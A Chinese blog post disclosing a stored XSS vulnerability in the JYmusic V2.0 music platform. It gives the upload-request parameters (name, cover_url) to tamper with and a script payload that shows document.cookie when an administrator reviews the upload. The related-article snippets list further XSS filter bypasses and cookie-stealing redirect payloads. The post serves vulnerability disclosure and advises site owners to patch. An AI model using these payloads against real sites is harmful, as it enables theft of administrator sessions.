首页 > 其他分享 >jymusic V2.0 前台XSS漏洞

jymusic V2.0 前台XSS漏洞

时间:2024-03-05 13:59:22浏览次数:27  
标签:XSS jymusic 音乐 V2.0 漏洞 前台

JYmusic 是一款开源的跨平台音乐管理系统。

有着清新的界面和强大的功能。

jymusic界面
在2.0版本中发现了一个可以打管理员cookie的漏洞

利用条件

1.登录会员

2.认证音乐人

上传音乐时,抓包,修改name或者cover_url参数

值为:


XSS"><script>alert(document.cookie)</script>>

此时提交的音乐就会存储到数据库中,由于name和cover_url没有过滤,导致在后台管理员审核的时候会触发一个XSS

效果

后台审核处触发

如果通过审核了前台也会大面积触发

前台触发

前台触发

这个问题在V2.0以下版本都存在(目前所有版本通杀)

建议存在问题的站长及时修复。

标签:XSS,jymusic,音乐,V2.0,漏洞,前台
From: https://www.cnblogs.com/WaxToday/p/18053880

相关文章

  • xss跨站脚本
    1、演示xss漏洞的三种类型1.xss(反射型)服务器将浏览器输入的输入,原样返回给浏览器恶意代码并没有保存在目标网站,通过引诱用户点击一个链接到目标网站的恶意链接来实施攻击。1.代码2.xss(存储型)服务器接收到浏览器的输入,先存储到服务器的数据库,再原样返......
  • 编码绕过xss说明和htmlspecialchars函数
    html实体编码JS编码1.htmlspecialchars函数把一些预定义的字符转换为html实体预定义的字符&->&amp;"->"'->'<-><>->gt;<script>--><&ltscript&gt默认绕过绕过方式:payload:'onclick='alert(123)'或者&#......
  • XSS后台代码绕过
    xss_01正则表达式替换绕过方式:大小写混合或纯大写绕过paylaod:<scripT>alert(AAA);</Script>或<SCRIPT>alert(123);<SCRIPT>字符最小化将获取的message数据中获取的大小写字符全部转换为小写绕过方式:通过双写绕过Payload:<sc<script>ript>alert</scrip<script>t>......
  • 牛相片摄影时间更改助手V2.00 免费版
     蓝牛相片摄影时间更改助手是一款绿色免费的照片批量修改摄影日期时间,让您的相片一目发然相片摄影时间 软件全自动一键操作,再也不必一个一个手动修改了更新日志:2023年9月12日V2.00 支持自定义图片类型 升级核心代码2023.04.25V1.50优化代码提高速度修复BUG 本地......
  • 反射型xss的post请求获取cookie
    攻击者构造的网站地址:192.168.10.12:100受害者主机:192.168.10.134目标服务器:192.168.10.1步骤一:受害者主机访问目标服务器根据提示登录步骤二:输入xssPayload<script>document.location='http://192.168.10.12:100/pkxss/xcookie/cookie.php?cookie='+document.cookie<......
  • xss利用之盗取cookie示例
    实验环境目标网站:宿主机:192.168.10.1访问虚拟机win11:192.168.10.134伪造网站:192.168.10.12:100pikachu步骤一:受害者cookie:步骤二:输入xsspayload'"><script>document.location='http://192.168.10.12:100/pikachu/pkxss/xccokie/cookie.php?cookie='+doc......
  • vue3+vite使用vue-pdf-embed或者pdf-vue3预览 PDF 文件(能躲避 XSS 攻击,需要 pdf 文件
    1.使用vue-pdf-embed1.npm安装所需插件[email protected]@0.1.62.封装组件(创建pdfPriview.index文件)<template><divclass="pdf-preview"> <vue-pdf-embed :source="state.source" v-for="pageinstate......
  • DVWA-XSS(Stored)存储型跨站脚本攻击
    DVWA-XSS(Stored)存储型XSS是一种持久型XSS,与DOM型和Reflected型区别在于将恶意脚本注入到网站的某个存储区域,如数据库或其他文件类型中。每当访问网站时,服务器在生成页面时,将含有恶意脚本当做有效内容插入到页面中,并响应给用户。浏览器就会执行页面中的恶意脚本,从而对访问者造成攻......
  • XSS-Cross Site Scripting
    一、XSS简介与危害简介跨站脚本攻击XSS(CrossSiteScripting),为了不和层叠样式表CSS(CascadingStyleSheets)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。......
  • 三十二、XSS
    XSSFilter.pyfrombs4importBeautifulSoupclassXSSFilter(object):__instance=Nonedef__init__(self):#XSS白名单self.valid_tags={"font":['color','size','face','sty......